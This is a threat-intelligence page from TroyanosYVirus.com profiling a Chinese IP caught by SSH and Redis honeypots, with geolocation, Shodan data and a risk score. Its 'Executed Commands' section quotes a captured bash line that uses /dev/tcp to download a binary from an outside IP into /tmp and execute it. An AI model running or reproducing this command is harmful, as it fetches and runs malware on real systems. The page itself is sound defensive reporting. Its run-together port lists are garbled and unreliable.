TROYANOSYVIRUS
Active ThreatLOW

114.66.16.119

Country of Origin🇨🇳 China
First Detection4/26/2026
Last Activity4/26/2026
ISPNINGBO, ZHEJIANG Province, P.R.China.
🎯
37
Total Attacks
🔌
2
Ports
📡
2
Attack Types
🦠
1
Malware

Geolocation

Country
🇨🇳 China
City
Unknown
ASN
AS136188
ISP
NINGBO, ZHEJIANG Province, P.R.China.

Attack Types

ssh_telnet_honeypot
redis_honeypot

Attacked Ports

226379

Associated Malware

Executed Commands

$nohup bash -c "exec 6<>/dev/tcp/47.242.120.223/60125 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/GSx5XdhMKj && chmod +x /tmp/GSx5XdhMKj && /tmp/GSx5XdhMKj bXjKppN8cWZ9jrvJaBYaaM+kimV+emuMpM12GB92zKSLf354dI2t3mwbAmrKppN0cHFrj6bEbhwdbMa1j3V7ZnCKu89oFQJqz6GHc3h5dIm1ym8CHmvHu41ren1xh6POaR4ceMqmk3xxZnKEu8xpFRZuzqSJdWh5dIq7z20aAmrPrJNxfHJzjaTPbgwYb9CniXdmf3eTrMhiGhxpzqWdcX9md4mn0GkeHHbMp45/fnh0j6DebB8CYce7hXdmeX2Nr8hoHR9s3qGKa39+a4ytzXYdH2nEo410en5lhbvMaRwCYM67jHd4cnONpMpoDBR2zKSFa3l/dJOkym4WGmjPpo1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
806379809961616
CPEs
cpe:/a:apache:http_servercpe:/a:f5:nginxcpe:/a:gitlab:gitlabcpe:/a:redislabs:redis

Risk Assessment

35
/100
LowMediumHighCritical
IP 114.66.16.119 - Detected Threat | TroyanosYVirus.com | TroyanosYVirus.com